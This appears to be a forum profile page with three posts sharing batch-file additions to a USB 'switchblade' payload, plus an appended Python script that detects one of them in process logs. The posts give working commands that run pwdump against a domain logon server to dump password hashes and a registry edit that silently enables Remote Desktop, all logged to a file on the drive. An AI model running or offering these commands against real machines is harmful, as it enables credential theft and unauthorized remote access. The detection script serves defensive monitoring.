msoule

Everything posted by msoule

  1. Here's another little mod. Not too glamorous but handy. This will check to see if the user is logged on to a domain server. If so, pwdump will run against the logonserver and dump the PWs from there. This will ONLY work if the logged on user has DomainAdmin rights. If the user does not have these rights the attempt will fail and WILL generate an event in the Security Log of the server. Also, I recommend using PWDump6 to avoid LSASS errors on the server. I have had LSASS crashes in my lab with previous PWDump versions but never with v6. Use with care.

         @echo ==================================================[Dump Server SAM] >> Documents\logfiles\%computername%_load.log 2>&1
         @if not %LOGONSERVER%==%COMPUTERNAME% .\pwdump %LOGONSERVER% >> Documents\logfiles\%computername%_load.log 2>&1
         @if %LOGONSERVER%==%COMPUTERNAME% @echo Logged on to local machine. Process skipped. >> Documents\logfiles\%computername%_load.log 2>&1
         @echo ==================================================[Dump END Server SAM] >> Documents\logfiles\%computername%_load.log 2>&1

  2. A few of you may find this handy. I made this little routine for the end of my batch file. It time and date stamps the log file. I had to tinker around with a few other aspects of the original go.cmd file in order to get it to work right. If you have issues let me know and I'll post my whole bat.

         if not exist documents\logfiles\temp md documents\logfiles\temp
         move Documents\logfiles\%computername%_load.log Documents\logfiles\temp
         FOR /F "usebackq tokens=1" %%n IN (`dir Documents\logfiles\temp /b`) DO @FOR /F "usebackq tokens=2,3,4 delims=/ " %%d IN (`date /t`) DO @FOR /F "usebackq tokens=1,2 delims=: " %%t IN (`time /t`) DO @ren Documents\logfiles\temp\%%n %computername%-%%d%%e%%f-%%t%%u.log
         move Documents\logfiles\temp\* Documents\logfiles
         rd Documents\logfiles\temp

  3. I did this to my switchblade too. The following line makes the needed registry change and will be reflected in the checkbox.

         @reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0 /f >> Documents\logfiles\%computername%_load.log 2>&1
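
Seen from the defender's side, the registry change in the last post is straightforward to spot in process-creation logs. The following is an added example, not part of the original posts: it flags `reg add` command lines that set `fDenyTSConnections` to 0. The sample events and host names are constructed, and it assumes process command lines are being collected (for example Security event 4688 with command-line auditing enabled).

```python
import re

# Terminal Server key under either hive spelling and any control set.
KEY_RE = re.compile(
    r"(?:HKLM|HKEY_LOCAL_MACHINE)\\SYSTEM\\(?:CurrentControlSet|ControlSet\d{3})"
    r"\\Control\\Terminal Server", re.IGNORECASE)
REG_ADD_RE = re.compile(r"\breg(?:\.exe)?\"?\s+add\b", re.IGNORECASE)
VALUE_RE = re.compile(r"/v\s+\"?fDenyTSConnections\b", re.IGNORECASE)
DATA_RE = re.compile(r"/d\s+\"?(0x[0-9a-f]+|\d+)", re.IGNORECASE)


def classify(cmdline):
    """Return 'rdp_enabled', 'rdp_disabled', or None if not a relevant write."""
    if not (REG_ADD_RE.search(cmdline) and KEY_RE.search(cmdline)
            and VALUE_RE.search(cmdline)):
        return None
    m = DATA_RE.search(cmdline)
    if m is None:
        return None
    text = m.group(1).lower()
    # reg.exe accepts decimal or 0x-prefixed hex for REG_DWORD data.
    number = int(text, 16) if text.startswith("0x") else int(text, 10)
    return "rdp_enabled" if number == 0 else "rdp_disabled"


def find_rdp_enable(events):
    """Return the hosts whose logged command line turned RDP on."""
    return [host for host, cmd in events if classify(cmd) == "rdp_enabled"]


# Constructed sample events: (host, process command line).
SAMPLE_EVENTS = [
    ("WS-014", r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control'
               r'\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0 /f'),
    ("WS-022", r'"C:\Windows\System32\reg.exe" ADD "HKLM\System\CurrentControlSet'
               r'\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f'),
    ("WS-031", r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"'
               r' /v fDenyTSConnections /t REG_DWORD /d 1 /f'),
    ("WS-040", r'reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"'
               r' /v fDenyTSConnections'),
]

if __name__ == "__main__":
    for host in find_rdp_enable(SAMPLE_EVENTS):
        print(f"ALERT {host}: fDenyTSConnections set to 0 (RDP enabled)")
```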